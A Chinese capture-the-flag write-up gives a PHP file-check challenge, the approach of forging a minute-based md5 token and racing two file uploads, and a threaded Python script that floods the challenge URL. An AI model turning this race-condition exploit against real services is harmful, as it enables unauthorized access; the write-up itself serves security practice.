题目:
function receiveStreamFile($receiveFile){
$streamData = isset($GLOBALS['HTTP_RAW_POST_DATA'])? $GLOBALS['HTTP_RAW_POST_DATA'] : '';
if(empty($streamData)){
$streamData = file_get_contents('php://input');
}
if($streamData!=''){
$ret = file_put_contents($receiveFile, $streamData, true);
}else{
$ret = false;
}
return $ret;
}
if(md5(date("i")) === $token){
$receiveFile = 'flag.dat';
receiveStreamFile($receiveFile);
if(md5_file($receiveFile)===md5_file("key.dat")){
if(hash_file("sha512",$receiveFile)!=hash_file("sha512","key.dat")){
$ret['success']="1";
$ret['msg']="人脸识别成功!$flag";
$ret['error']="0";
echo json_encode($ret);
return;
}
$ret['errormsg']="same file";
echo json_encode($ret);
return;
}
$ret['errormsg']="md5 error";
echo json_encode($ret);
return;
}
$ret['errormsg']="token error";
echo json_encode($ret);
return;
思路:
1.构造token
2.先上传一模一样的key.dat,通过md5值的比较
3.在极短的时间内,传上不同的key2.dat,通过SHA-512哈希值的比较。
脚本:
这里放了竞争的两种格式
import time
import hashlib
import requests
# import threading #法二
from concurrent.futures import ThreadPoolExecutor #法一
# 题目token
i = str(time.localtime().tm_min)
token = hashlib.md5(i.encode()).hexdigest()
# 上传的文件列表
file_paths = ['key.dat', 'key2.dat']
url = "https://a9a37cc7-8ff5-4587-b072-bcae28577c50.challenge.ctf.show/check.php?token={}&php://input".format(token)
# 读取数据
file_datas = {}
for file_path in file_paths:
with open(file_path, 'rb') as file:
file_datas[file_path] = file.read()
# 上传文件函数
def upload_file(file_path):
data = file_datas[file_path]
response = requests.post(url, data)
if "ctfshow" in response.text:
print(response.text)
# for i in range(50): #法二
# threading.Thread(target=upload_file, args=('key.dat',)).start()
# for i in range(50):
# threading.Thread(target=upload_file, args=('key2.dat',)).start()
with ThreadPoolExecutor() as executor: #法一
for i in range(200):
executor.map(upload_file, file_datas)